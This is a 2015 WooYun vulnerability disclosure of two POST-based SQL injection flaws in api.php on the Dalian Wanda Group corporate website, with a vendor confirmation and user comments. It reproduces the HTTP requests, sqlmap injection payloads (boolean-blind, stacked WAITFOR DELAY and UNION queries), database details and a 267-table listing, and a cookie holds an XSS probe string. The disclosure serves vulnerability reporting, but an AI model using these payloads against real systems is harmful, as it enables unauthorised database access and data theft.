当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(7) 关注此漏洞

缺陷编号: WooYun-2015-132136

漏洞标题: 大连万达集团股份有限公司官方网站两枚POST型SQL注入打包

相关厂商: 大连万达集团股份有限公司

漏洞作者: 百度流氓

提交时间: 2015-08-06 16:13

公开时间: 2015-09-20 16:48

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 无

0人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-06: 细节已通知厂商并且等待厂商处理中
2015-08-06: 厂商已经确认,细节仅向厂商公开
2015-08-16: 细节向核心白帽子及相关领域专家公开
2015-08-26: 细节向普通白帽子公开
2015-09-05: 细节向实习白帽子公开
2015-09-20: 细节向公众公开

简要描述:

大连万达集团股份有限公司官方网站两枚POST型SQL注入打包

详细说明:

包1:

code 区域
POST /api.php?op=feedback HTTP/1.1


Content-Length: 93


Content-Type: application/x-www-form-urlencoded


X-Requested-With: XMLHttpRequest


Referer: http://www.wanda.cn/


Cookie: WANDACNSESSID=8rurvpb9rhelnotj6kvh6e1ad1; HMVT=cd44f738169a36ff869eee3ca6afb9b1|1438496238|; HMACCOUNT=2C9F94FD6DF138AC; Hm_lvt_cd44f738169a36ff869eee3ca6afb9b1=1438496681,1438496688,1438496718,1438496738; Hm_lpvt_cd44f738169a36ff869eee3ca6afb9b1=1438496738; __utmt=1; __utma=41079204.802376289.1438495914.1438495914.1438495914.1; __utmb=41079204.1.10.1438495914; __utmc=41079204; __utmz=41079204.1438495914.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); BAIDUID=BF1A957F41EF89BAFA6A6BE08083EEC2:FG=1; CNZZDATA5891341=cnzz_eid%3D136358418-1438494730-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1438494730


Host: www.wanda.cn


Connection: Keep-alive


Accept-Encoding: gzip,deflate


User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21


Accept: */*





City=1169&DictionaryID=LY&type=GetProJectList





包2:

code 区域
POST /api.php?op=feedback HTTP/1.1


Content-Length: 68


Content-Type: application/x-www-form-urlencoded


X-Requested-With: XMLHttpRequest


Referer: http://www.wanda.cn/


Cookie: WANDACNSESSID=8rurvpb9rhelnotj6kvh6e1ad1; HMVT=cd44f738169a36ff869eee3ca6afb9b1|1438496238|; HMACCOUNT=2C9F94FD6DF138AC; Hm_lvt_cd44f738169a36ff869eee3ca6afb9b1=1438496681,1438496688,1438496718,1438496738; Hm_lpvt_cd44f738169a36ff869eee3ca6afb9b1=1438496738; __utmt=1; __utma=41079204.802376289.1438495914.1438495914.1438495914.1; __utmb=41079204.1.10.1438495914; __utmc=41079204; __utmz=41079204.1438495914.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); BAIDUID=BF1A957F41EF89BAFA6A6BE08083EEC2:FG=1; CNZZDATA5891341=cnzz_eid%3D136358418-1438494730-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1438494730


Host: www.wanda.cn


Connection: Keep-alive


Accept-Encoding: gzip,deflate


User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21


Accept: */*





Province=fWqPza1t&type=getCity

漏洞证明:

1.

QQ截图20150806150248.jpg



2.

QQ截图20150806150616.jpg



截图太麻烦我直接上日志

1.

code 区域
sqlmap identified the following injection point(s) with a total of 40 HTTP(s) requests:


---


Parameter: DictionaryID (POST)


    Type: boolean-based blind


    Title: AND boolean-based blind - WHERE or HAVING clause


    Payload: City=1169&DictionaryID=LY' AND 3158=3158 AND 'hNyR'='hNyR&type=GetProJectList





    Type: stacked queries


    Title: Microsoft SQL Server/Sybase stacked queries (comment)


    Payload: City=1169&DictionaryID=LY';WAITFOR DELAY '0:0:5'--&type=GetProJectList





    Type: UNION query


    Title: Generic UNION query (NULL) - 2 columns


    Payload: City=1169&DictionaryID=LY' UNION ALL SELECT CHAR(113)+CHAR(122)+CHAR(98)+CHAR(113)+CHAR(113)+CHAR(108)+CHAR(76)+CHAR(108)+CHAR(120)+CHAR(85)+CHAR(66)+CHAR(106)+CHAR(68)+CHAR(70)+CHAR(119)+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(112)+CHAR(113),NULL-- &type=GetProJectList


---


web application technology: Nginx, PHP 5.3.25


back-end DBMS: Microsoft SQL Server 2008


current user:    'ksfw_user'


sqlmap resumed the following injection point(s) from stored session:


---


Parameter: DictionaryID (POST)


    Type: boolean-based blind


    Title: AND boolean-based blind - WHERE or HAVING clause


    Payload: City=1169&DictionaryID=LY' AND 3158=3158 AND 'hNyR'='hNyR&type=GetProJectList





    Type: stacked queries


    Title: Microsoft SQL Server/Sybase stacked queries (comment)


    Payload: City=1169&DictionaryID=LY';WAITFOR DELAY '0:0:5'--&type=GetProJectList





    Type: UNION query


    Title: Generic UNION query (NULL) - 2 columns


    Payload: City=1169&DictionaryID=LY' UNION ALL SELECT CHAR(113)+CHAR(122)+CHAR(98)+CHAR(113)+CHAR(113)+CHAR(108)+CHAR(76)+CHAR(108)+CHAR(120)+CHAR(85)+CHAR(66)+CHAR(106)+CHAR(68)+CHAR(70)+CHAR(119)+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(112)+CHAR(113),NULL-- &type=GetProJectList


---


web application technology: Nginx, PHP 5.3.25


back-end DBMS: Microsoft SQL Server 2008


current database:    'ksfw'


sqlmap resumed the following injection point(s) from stored session:


---


Parameter: DictionaryID (POST)


    Type: boolean-based blind


    Title: AND boolean-based blind - WHERE or HAVING clause


    Payload: City=1169&DictionaryID=LY' AND 3158=3158 AND 'hNyR'='hNyR&type=GetProJectList





    Type: stacked queries


    Title: Microsoft SQL Server/Sybase stacked queries (comment)


    Payload: City=1169&DictionaryID=LY';WAITFOR DELAY '0:0:5'--&type=GetProJectList





    Type: UNION query


    Title: Generic UNION query (NULL) - 2 columns


    Payload: City=1169&DictionaryID=LY' UNION ALL SELECT CHAR(113)+CHAR(122)+CHAR(98)+CHAR(113)+CHAR(113)+CHAR(108)+CHAR(76)+CHAR(108)+CHAR(120)+CHAR(85)+CHAR(66)+CHAR(106)+CHAR(68)+CHAR(70)+CHAR(119)+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(112)+CHAR(113),NULL-- &type=GetProJectList


---


web application technology: Nginx, PHP 5.3.25


back-end DBMS: Microsoft SQL Server 2008


Database: ksfw


[267 tables]


+---------------------------------+


| AL_ADD_APPLY                    |


| AL_AUDIT_LOG                    |


| AL_CATE                         |


| AL_CONTENT                      |


| AL_CONTENT_CATE                 |


| AL_CONT_DETAIL                  |


| AU_ACCREDIT_DATA                |


| AU_ACCREDIT_FUNC                |


| AU_ACCREDIT_MENU                |


| CONT_HANDEL_LOG                 |


| CUS_ASSIGN_LOG                  |


| CUS_BL                          |


| CUS_BLACKLIST                   |


| CUS_BL_APPLY                    |


| CUS_BL_CONTACT                  |


| CUS_BL_INTERVAL                 |


| CUS_BL_LOG                      |


| CUS_BL_PHONE                    |


| CUS_CONTACT                     |


| CUS_CONT_INFO                   |


| CUS_CONT_TYPE                   |


| CUS_DOM                         |


| CUS_HOBBY                       |


| CUS_INFO                        |


| CUS_OR_CONTACT                  |


| CUS_QU_CONTACT                  |


| CUS_RECOMMEND                   |


| CUS_SPEC_EVENT                  |


| ComplaintPlazaView              |


| EHR_EMPLOYEE_ORG_REL_TEMP       |


| EHR_EMPLOYEE_POS_REL_TEMP       |


| EHR_EMPLOYEE_TEMP               |


| EHR_ORGNIZATION_TEMP            |


| EHR_POSITION_TEMP               |


| EMPLOYEE_ORG_REL                |


| FAC_TS_ATTR_DETAIL              |


| FAC_TS_ATTR_DETAIL_POEP         |


| FAC_TS_CONT_DETAIL              |


| FAC_TS_DEAL_TIME_DETAIL         |


| FAC_TS_KM_COUNT_DAY             |


| FAC_TS_OPER_DETAIL              |


| FAC_TS_QD_COUNT_DAY             |


| FAC_TS_YJ_DETAIL                |


| FAC_TS_ZDY_ATTR_DETAIL          |


| FAC_ZJ_CONTACT_HZ_VIEW          |


| FAC_ZJ_CONTACT_INFO_VIEW        |


| HW_CTICONFIG                    |


| HW_DUTYMANAGE                   |


| HW_DUTY_EMP                     |


| HW_SEATACCREDIT                 |


| HW_SKILLGROUP                   |


| HW_SKILLSEAT                    |


| HW_SKILL_SEAT                   |


| IMS_BASIC_REPLY                 |


| IM_NEWS                         |


| IM_NEWS_REAL_RECEIVER           |


| IM_NEWS_RECEIVER                |


| IVR_CITY_YETAI                  |


| IVR_MOBILE_TELEPHONE_MAPPING    |


| IVR_OFFLINE_TO_MOBILE           |


| IVR_TELEPHONE_AREA_MAPPING      |


| IVR_VIP_EMP                     |


| JBPM4_DEPLOYMENT                |


| JBPM4_DEPLOYPROP                |


| JBPM4_EXECUTION                 |


| JBPM4_HIST_ACTINST              |


| JBPM4_HIST_DETAIL               |


| JBPM4_HIST_PROCINST             |


| JBPM4_HIST_TASK                 |


| JBPM4_HIST_VAR                  |


| JBPM4_ID_GROUP                  |


| JBPM4_ID_MEMBERSHIP             |


| JBPM4_ID_USER                   |


| JBPM4_JOB                       |


| JBPM4_LOB                       |


| JBPM4_PARTICIPATION             |


| JBPM4_PROPERTY                  |


| JBPM4_SWIMLANE                  |


| JBPM4_TASK                      |


| JBPM4_VARIABLE                  |


| KM_BASEINFO                     |


| KM_CATE                         |


| KM_EVAL                         |


| KM_INFO_REL                     |


| KN_SUBJECT_CATE                 |


| KN_SUBJECT_ITEM                 |


| KN_SURVEY                       |


| KN_SURVEY_ANSWER                |


| KN_SURVEY_R_SUBJECT             |


| KN_SURVEY_SUBJECT               |


| OAMQMessages                    |


| OB_ACTIV_BASE                   |


| OB_ACTIV_OPELOG                 |


| OB_ACTIV_RULE                   |


| OB_ASSIGN_ROLE                  |


| OB_ASSIGN_SET                   |


| OB_CONTACT_ITEM                 |


| OB_CONTACT_SET                  |


| OB_CUS_ATTRI                    |


| OB_CUS_TEMPL                    |


| OB_PERMIT_TIME                  |


| OB_PROJ_BASE                    |


| OB_PROJ_OPELOG                  |


| OB_STAGE_BASE                   |


| OB_STAGE_ITEM                   |


| ONLINE_CONTACT                  |


| ONLINE_CONTACT_READ_LOG         |


| ONLINE_CONTACT_RECEIVER         |


| OP_CT_COLLECT                   |


| OP_CT_NOTICE                    |


| OP_CT_NOTICE_READ_LOG           |


| OP_CT_NOTICE_RECEIVER           |


| ORGNIZATION                     |


| QD_WHITE_LIST                   |


| REC_SYN_SMS                     |


| REL_SPLIT_TYPE                  |


| RP_CMS_SKILL_HOUR               |


| SHEET                           |


| SHEET_BACK                      |


| SHEET_CONSULT                   |


| SHEET_REMINDER                  |


| SHEET_REPAIRS                   |


| SHEET_TS                        |


| SHEET_VOID                      |


| SYS_ATTACHMENT                  |


| SYS_BP_ITEM                     |


| SYS_BP_TYPE                     |


| SYS_CONTACT_ADDR                |


| SYS_DEPARTMENT                  |


| SYS_DIC                         |


| SYS_DIC_ITEM                    |


| SYS_EMP                         |


| SYS_EMPLOYEE                    |


| SYS_GROUP                       |


| SYS_HANDLE_LOG                  |


| SYS_HOLIDAY                     |


| SYS_LOG_OPERATE                 |


| SYS_MENU                        |


| SYS_MENU_NAV                    |


| SYS_OPRITION_LOG                |


| SYS_ORG_ROLE                    |


| SYS_PASSWORD_POLICY             |


| SYS_REGION                      |


| SYS_RESOURCE                    |


| SYS_ROLE                        |


| SYS_ROLE_CATE                   |


| SYS_ROLE_EMP                    |


| SYS_ROLE_GROUP                  |


| SYS_ROLE_MENU                   |


| SYS_ROLE_PARAM                  |


| SYS_ROLE_USER                   |


| SYS_SP_ITEM                     |


| SYS_SP_TYPE                     |


| SYS_TENEMENT                    |


| SYS_TENEMENT_DOC                |


| SYS_USER                        |


| SYS_USER_GROUP                  |


| SYS_USER_LOGIN_LOG              |


| SYS_WORKTIME                    |


| TOOL_NOTE                       |


| TSM_Messages                    |


| Temp_Organizations              |


| WC_ACCOUNT                      |


| WC_FANS                         |


| WC_FANS_GROUP                   |


| WC_ISSUE                        |


| WC_MATERIAL_API                 |


| WC_MATERIAL_PICTURE             |


| WC_MATERIAL_VOICE               |


| WC_MEMBER                       |


| WC_MEMBER_GROUP                 |


| WC_MENU                         |


| WC_MSG_SEND                     |


| WC_REPLY_RULE                   |


| WC_REPLY_TEXT                   |


| WC_REPLY_VIDEO                  |


| WC_RULE_KEYWORD                 |


| WC_RULE_REPLY                   |


| WC_USER_BINDING                 |


| WD_MASS_HANDLE                  |


| WD_MASS_INCIDENT                |


| WD_MASS_TASK                    |


| WD_ORDERHANDLE                  |


| WD_SG                           |


| WD_TS_SHEET                     |


| WD_WEBORDER                     |


| WD_YQJK                         |


| WFE_APPROVE_LOG                 |


| WFE_BEFORE_LOG                  |


| WFE_HANDLE_APPLY                |


| WFE_REMINDER_LOG                |


| WFE_SHEET                       |


| WFE_SHIFT_LOG                   |


| WFE_TODO                        |


| WFE_TODO_ASSIGNMENT             |


| WFE_UPGRADE_LOG                 |


| WFE_URGE                        |


| WF_AR_NOTICE_LOG                |


| WF_AR_NOTICE_LOG_20150420before |


| WF_AR_NOTICE_LOG_CURR_temp      |


| WF_AR_NOTICE_LOG_temp           |


| WF_AR_RE_LOG                    |


| WF_Add_DATA                     |


| WF_FLOW_CATE                    |


| WF_FLOW_INFO                    |


| WF_FLOW_VARIABLE                |


| WF_NODE                         |


| WF_NODE_ALERT                   |


| WF_NODE_ALTER_REG               |


| WF_NODE_CONDITION               |


| WF_NODE_EXEC_REG                |


| WF_NODE_NOTICE                  |


| WF_NODE_ROLE                    |


| WF_NODE_TIME                    |


| WF_SHEEP_ASSOCIATED             |


| WF_SHEET_ASSOCIATED             |


| WSQ_BUILDING                    |


| WSQ_COMMUNITY                   |


| WSQ_FAN_CUS                     |


| WSQ_ROOM                        |


| WSQ_UNIT                        |


| Wanda_RT_CONTRACT               |


| ZJ_BATCH_BASE                   |


| ZJ_BATCH_CONTACT                |


| ZJ_BATCH_DF                     |


| ZJ_BATCH_RULE                   |


| ZJ_BATCH_SF                     |


| ZJ_BATCH_SHEET                  |


| ZJ_CONT_ITEM                    |


| ZJ_CONT_ITEM_KPI                |


| ZJ_CONT_ITEM_KPI_PUBLISH        |


| ZJ_CONT_ITEM_PUBLISH            |


| ZJ_EVAL_BASE                    |


| ZJ_EVAL_CHECK                   |


| ZJ_EVAL_ITEM                    |


| ZJ_EVAL_S_BASE                  |


| ZJ_EVAL_S_RULE                  |


| ZJ_EXAMRULE_CONT                |


| ZJ_EXAM_RULE                    |


| ZJ_PROJ_BASE                    |


| ZJ_PROJ_ROLE                    |


| ZJ_REF                          |


| ZJ_REF_CONT                     |


| ZJ_REF_DEPT                     |


| ZJ_REVIEW                       |


| ZJ_TEMPL                        |


| ZJ_TEMPL_BASE                   |


| ZJ_TEMPL_ITEM                   |


| ZJ_TEMPL_ITEM_KPI               |


| ZJ_TEMPL_KPI                    |


| ZJ_TEMPL_PUBLISH                |


| ZJ_TEMP_CONT                    |


| ZJ_TEMP_CONT_PUBLISH            |


| ZJ_THRES                        |


| ZJ_THRES_BASE                   |


| ZJ_THRES_RULE                   |


| ZJ_ZJDF_JZITEM_LOG              |


| ZJ_ZJRW                         |


| ZJ_ZJRW_ASSIGN_LOG              |


| ZJ_ZJRW_ROLE                    |


| ZJ_test1                        |


| rec_syn_cms                     |


| unEmpForRole                    |


| unEmpInfoForRole                |


| wsq_commu_cus                   |


| wsq_zutuan                      |


| 查询                            |


+---------------------------------+



2.

code 区域
sqlmap identified the following injection point(s) with a total of 58 HTTP(s) requests:


---


Parameter: Province (POST)


    Type: stacked queries


    Title: Microsoft SQL Server/Sybase stacked queries (comment)


    Payload: Province=fWqPza1t';WAITFOR DELAY '0:0:5'--&type=getCity





    Type: UNION query


    Title: Generic UNION query (NULL) - 2 columns


    Payload: Province=fWqPza1t' UNION ALL SELECT CHAR(113)+CHAR(120)+CHAR(120)+CHAR(106)+CHAR(113)+CHAR(110)+CHAR(110)+CHAR(89)+CHAR(83)+CHAR(65)+CHAR(83)+CHAR(106)+CHAR(86)+CHAR(112)+CHAR(66)+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(98)+CHAR(113),NULL-- &type=getCity


---


web application technology: Nginx, PHP 5.3.25


back-end DBMS: Microsoft SQL Server 2008


current user:    'ksfw_user'


sqlmap resumed the following injection point(s) from stored session:


---


Parameter: Province (POST)


    Type: stacked queries


    Title: Microsoft SQL Server/Sybase stacked queries (comment)


    Payload: Province=fWqPza1t';WAITFOR DELAY '0:0:5'--&type=getCity





    Type: UNION query


    Title: Generic UNION query (NULL) - 2 columns


    Payload: Province=fWqPza1t' UNION ALL SELECT CHAR(113)+CHAR(120)+CHAR(120)+CHAR(106)+CHAR(113)+CHAR(110)+CHAR(110)+CHAR(89)+CHAR(83)+CHAR(65)+CHAR(83)+CHAR(106)+CHAR(86)+CHAR(112)+CHAR(66)+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(98)+CHAR(113),NULL-- &type=getCity


---


web application technology: Nginx, PHP 5.3.25


back-end DBMS: Microsoft SQL Server 2008


current database:    'ksfw'


sqlmap resumed the following injection point(s) from stored session:


---


Parameter: Province (POST)


    Type: stacked queries


    Title: Microsoft SQL Server/Sybase stacked queries (comment)


    Payload: Province=fWqPza1t';WAITFOR DELAY '0:0:5'--&type=getCity





    Type: UNION query


    Title: Generic UNION query (NULL) - 2 columns


    Payload: Province=fWqPza1t' UNION ALL SELECT CHAR(113)+CHAR(120)+CHAR(120)+CHAR(106)+CHAR(113)+CHAR(110)+CHAR(110)+CHAR(89)+CHAR(83)+CHAR(65)+CHAR(83)+CHAR(106)+CHAR(86)+CHAR(112)+CHAR(66)+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(98)+CHAR(113),NULL-- &type=getCity


---


web application technology: Nginx, PHP 5.3.25


back-end DBMS: Microsoft SQL Server 2008


Database: ksfw


[267 tables]


+---------------------------------+


| AL_ADD_APPLY                    |


| AL_AUDIT_LOG                    |


| AL_CATE                         |


| AL_CONTENT                      |


| AL_CONTENT_CATE                 |


| AL_CONT_DETAIL                  |


| AU_ACCREDIT_DATA                |


| AU_ACCREDIT_FUNC                |


| AU_ACCREDIT_MENU                |


| CONT_HANDEL_LOG                 |


| CUS_ASSIGN_LOG                  |


| CUS_BL                          |


| CUS_BLACKLIST                   |


| CUS_BL_APPLY                    |


| CUS_BL_CONTACT                  |


| CUS_BL_INTERVAL                 |


| CUS_BL_LOG                      |


| CUS_BL_PHONE                    |


| CUS_CONTACT                     |


| CUS_CONT_INFO                   |


| CUS_CONT_TYPE                   |


| CUS_DOM                         |


| CUS_HOBBY                       |


| CUS_INFO                        |


| CUS_OR_CONTACT                  |


| CUS_QU_CONTACT                  |


| CUS_RECOMMEND                   |


| CUS_SPEC_EVENT                  |


| ComplaintPlazaView              |


| EHR_EMPLOYEE_ORG_REL_TEMP       |


| EHR_EMPLOYEE_POS_REL_TEMP       |


| EHR_EMPLOYEE_TEMP               |


| EHR_ORGNIZATION_TEMP            |


| EHR_POSITION_TEMP               |


| EMPLOYEE_ORG_REL                |


| FAC_TS_ATTR_DETAIL              |


| FAC_TS_ATTR_DETAIL_POEP         |


| FAC_TS_CONT_DETAIL              |


| FAC_TS_DEAL_TIME_DETAIL         |


| FAC_TS_KM_COUNT_DAY             |


| FAC_TS_OPER_DETAIL              |


| FAC_TS_QD_COUNT_DAY             |


| FAC_TS_YJ_DETAIL                |


| FAC_TS_ZDY_ATTR_DETAIL          |


| FAC_ZJ_CONTACT_HZ_VIEW          |


| FAC_ZJ_CONTACT_INFO_VIEW        |


| HW_CTICONFIG                    |


| HW_DUTYMANAGE                   |


| HW_DUTY_EMP                     |


| HW_SEATACCREDIT                 |


| HW_SKILLGROUP                   |


| HW_SKILLSEAT                    |


| HW_SKILL_SEAT                   |


| IMS_BASIC_REPLY                 |


| IM_NEWS                         |


| IM_NEWS_REAL_RECEIVER           |


| IM_NEWS_RECEIVER                |


| IVR_CITY_YETAI                  |


| IVR_MOBILE_TELEPHONE_MAPPING    |


| IVR_OFFLINE_TO_MOBILE           |


| IVR_TELEPHONE_AREA_MAPPING      |


| IVR_VIP_EMP                     |


| JBPM4_DEPLOYMENT                |


| JBPM4_DEPLOYPROP                |


| JBPM4_EXECUTION                 |


| JBPM4_HIST_ACTINST              |


| JBPM4_HIST_DETAIL               |


| JBPM4_HIST_PROCINST             |


| JBPM4_HIST_TASK                 |


| JBPM4_HIST_VAR                  |


| JBPM4_ID_GROUP                  |


| JBPM4_ID_MEMBERSHIP             |


| JBPM4_ID_USER                   |


| JBPM4_JOB                       |


| JBPM4_LOB                       |


| JBPM4_PARTICIPATION             |


| JBPM4_PROPERTY                  |


| JBPM4_SWIMLANE                  |


| JBPM4_TASK                      |


| JBPM4_VARIABLE                  |


| KM_BASEINFO                     |


| KM_CATE                         |


| KM_EVAL                         |


| KM_INFO_REL                     |


| KN_SUBJECT_CATE                 |


| KN_SUBJECT_ITEM                 |


| KN_SURVEY                       |


| KN_SURVEY_ANSWER                |


| KN_SURVEY_R_SUBJECT             |


| KN_SURVEY_SUBJECT               |


| OAMQMessages                    |


| OB_ACTIV_BASE                   |


| OB_ACTIV_OPELOG                 |


| OB_ACTIV_RULE                   |


| OB_ASSIGN_ROLE                  |


| OB_ASSIGN_SET                   |


| OB_CONTACT_ITEM                 |


| OB_CONTACT_SET                  |


| OB_CUS_ATTRI                    |


| OB_CUS_TEMPL                    |


| OB_PERMIT_TIME                  |


| OB_PROJ_BASE                    |


| OB_PROJ_OPELOG                  |


| OB_STAGE_BASE                   |


| OB_STAGE_ITEM                   |


| ONLINE_CONTACT                  |


| ONLINE_CONTACT_READ_LOG         |


| ONLINE_CONTACT_RECEIVER         |


| OP_CT_COLLECT                   |


| OP_CT_NOTICE                    |


| OP_CT_NOTICE_READ_LOG           |


| OP_CT_NOTICE_RECEIVER           |


| ORGNIZATION                     |


| QD_WHITE_LIST                   |


| REC_SYN_SMS                     |


| REL_SPLIT_TYPE                  |


| RP_CMS_SKILL_HOUR               |


| SHEET                           |


| SHEET_BACK                      |


| SHEET_CONSULT                   |


| SHEET_REMINDER                  |


| SHEET_REPAIRS                   |


| SHEET_TS                        |


| SHEET_VOID                      |


| SYS_ATTACHMENT                  |


| SYS_BP_ITEM                     |


| SYS_BP_TYPE                     |


| SYS_CONTACT_ADDR                |


| SYS_DEPARTMENT                  |


| SYS_DIC                         |


| SYS_DIC_ITEM                    |


| SYS_EMP                         |


| SYS_EMPLOYEE                    |


| SYS_GROUP                       |


| SYS_HANDLE_LOG                  |


| SYS_HOLIDAY                     |


| SYS_LOG_OPERATE                 |


| SYS_MENU                        |


| SYS_MENU_NAV                    |


| SYS_OPRITION_LOG                |


| SYS_ORG_ROLE                    |


| SYS_PASSWORD_POLICY             |


| SYS_REGION                      |


| SYS_RESOURCE                    |


| SYS_ROLE                        |


| SYS_ROLE_CATE                   |


| SYS_ROLE_EMP                    |


| SYS_ROLE_GROUP                  |


| SYS_ROLE_MENU                   |


| SYS_ROLE_PARAM                  |


| SYS_ROLE_USER                   |


| SYS_SP_ITEM                     |


| SYS_SP_TYPE                     |


| SYS_TENEMENT                    |


| SYS_TENEMENT_DOC                |


| SYS_USER                        |


| SYS_USER_GROUP                  |


| SYS_USER_LOGIN_LOG              |


| SYS_WORKTIME                    |


| TOOL_NOTE                       |


| TSM_Messages                    |


| Temp_Organizations              |


| WC_ACCOUNT                      |


| WC_FANS                         |


| WC_FANS_GROUP                   |


| WC_ISSUE                        |


| WC_MATERIAL_API                 |


| WC_MATERIAL_PICTURE             |


| WC_MATERIAL_VOICE               |


| WC_MEMBER                       |


| WC_MEMBER_GROUP                 |


| WC_MENU                         |


| WC_MSG_SEND                     |


| WC_REPLY_RULE                   |


| WC_REPLY_TEXT                   |


| WC_REPLY_VIDEO                  |


| WC_RULE_KEYWORD                 |


| WC_RULE_REPLY                   |


| WC_USER_BINDING                 |


| WD_MASS_HANDLE                  |


| WD_MASS_INCIDENT                |


| WD_MASS_TASK                    |


| WD_ORDERHANDLE                  |


| WD_SG                           |


| WD_TS_SHEET                     |


| WD_WEBORDER                     |


| WD_YQJK                         |


| WFE_APPROVE_LOG                 |


| WFE_BEFORE_LOG                  |


| WFE_HANDLE_APPLY                |


| WFE_REMINDER_LOG                |


| WFE_SHEET                       |


| WFE_SHIFT_LOG                   |


| WFE_TODO                        |


| WFE_TODO_ASSIGNMENT             |


| WFE_UPGRADE_LOG                 |


| WFE_URGE                        |


| WF_AR_NOTICE_LOG                |


| WF_AR_NOTICE_LOG_20150420before |


| WF_AR_NOTICE_LOG_CURR_temp      |


| WF_AR_NOTICE_LOG_temp           |


| WF_AR_RE_LOG                    |


| WF_Add_DATA                     |


| WF_FLOW_CATE                    |


| WF_FLOW_INFO                    |


| WF_FLOW_VARIABLE                |


| WF_NODE                         |


| WF_NODE_ALERT                   |


| WF_NODE_ALTER_REG               |


| WF_NODE_CONDITION               |


| WF_NODE_EXEC_REG                |


| WF_NODE_NOTICE                  |


| WF_NODE_ROLE                    |


| WF_NODE_TIME                    |


| WF_SHEEP_ASSOCIATED             |


| WF_SHEET_ASSOCIATED             |


| WSQ_BUILDING                    |


| WSQ_COMMUNITY                   |


| WSQ_FAN_CUS                     |


| WSQ_ROOM                        |


| WSQ_UNIT                        |


| Wanda_RT_CONTRACT               |


| ZJ_BATCH_BASE                   |


| ZJ_BATCH_CONTACT                |


| ZJ_BATCH_DF                     |


| ZJ_BATCH_RULE                   |


| ZJ_BATCH_SF                     |


| ZJ_BATCH_SHEET                  |


| ZJ_CONT_ITEM                    |


| ZJ_CONT_ITEM_KPI                |


| ZJ_CONT_ITEM_KPI_PUBLISH        |


| ZJ_CONT_ITEM_PUBLISH            |


| ZJ_EVAL_BASE                    |


| ZJ_EVAL_CHECK                   |


| ZJ_EVAL_ITEM                    |


| ZJ_EVAL_S_BASE                  |


| ZJ_EVAL_S_RULE                  |


| ZJ_EXAMRULE_CONT                |


| ZJ_EXAM_RULE                    |


| ZJ_PROJ_BASE                    |


| ZJ_PROJ_ROLE                    |


| ZJ_REF                          |


| ZJ_REF_CONT                     |


| ZJ_REF_DEPT                     |


| ZJ_REVIEW                       |


| ZJ_TEMPL                        |


| ZJ_TEMPL_BASE                   |


| ZJ_TEMPL_ITEM                   |


| ZJ_TEMPL_ITEM_KPI               |


| ZJ_TEMPL_KPI                    |


| ZJ_TEMPL_PUBLISH                |


| ZJ_TEMP_CONT                    |


| ZJ_TEMP_CONT_PUBLISH            |


| ZJ_THRES                        |


| ZJ_THRES_BASE                   |


| ZJ_THRES_RULE                   |


| ZJ_ZJDF_JZITEM_LOG              |


| ZJ_ZJRW                         |


| ZJ_ZJRW_ASSIGN_LOG              |


| ZJ_ZJRW_ROLE                    |


| ZJ_test1                        |


| rec_syn_cms                     |


| unEmpForRole                    |


| unEmpInfoForRole                |


| wsq_commu_cus                   |


| wsq_zutuan                      |


| 查询                            |


+---------------------------------+



下边的下边就不操作了,日志一目了然。

修复方案:

一个api.php3个注入,我也是醉了。

大神在万达,你们比我懂.........

版权声明:转载请注明来源 百度流氓@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-08-06 16:47

厂商回复:

感谢百度流氓同学的持续关注与贡献!马上通知业务整改!

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2015-08-06 16:37 | 牛 小 帅 ( 普通白帽子 | Rank:1470 漏洞数:352 | 1.乌云最帅的男人 ...)
    0

    @百度流氓 又找了两枚啊 昨天一枚

    1# 回复此人
  2. 2015-08-06 16:40 | 百度流氓 ( 路人 | Rank:28 漏洞数:4 | 老衲法号:乱来)
    0

    @牛 小 帅 嗯,万达厂商真心不错所以在万达下点功夫。

    2# 回复此人
  3. 2015-08-06 16:41 | 牛 小 帅 ( 普通白帽子 | Rank:1470 漏洞数:352 | 1.乌云最帅的男人 ...)
    0

    @百度流氓 速度好快 嘎嘎

    3# 回复此人
  4. 2015-08-06 17:10 | zeracker 认证白帽子 ( 普通白帽子 | Rank:1077 漏洞数:139 | 爱吃小龙虾。)
    0

    厂商拿了最佳靠谱的厂商,看这样子 是要发礼品卡的节奏 @万达

    4# 回复此人
  5. 2015-08-06 17:15 | 牛 小 帅 ( 普通白帽子 | Rank:1470 漏洞数:352 | 1.乌云最帅的男人 ...)
    0

    @zeracker 我的芒果显示已送礼物给我 可是他连我联系方式都好像没

    5# 回复此人
  6. 2015-08-06 17:19 | 百度流氓 ( 路人 | Rank:28 漏洞数:4 | 老衲法号:乱来)
    0

    @牛 小 帅 。。。。。

    6# 回复此人
  7. 2015-08-06 17:21 | 牛 小 帅 ( 普通白帽子 | Rank:1470 漏洞数:352 | 1.乌云最帅的男人 ...)
    0

    @百度流氓 我错了 i am sorry

    7# 回复此人

登录后才能发表评论,请先 登录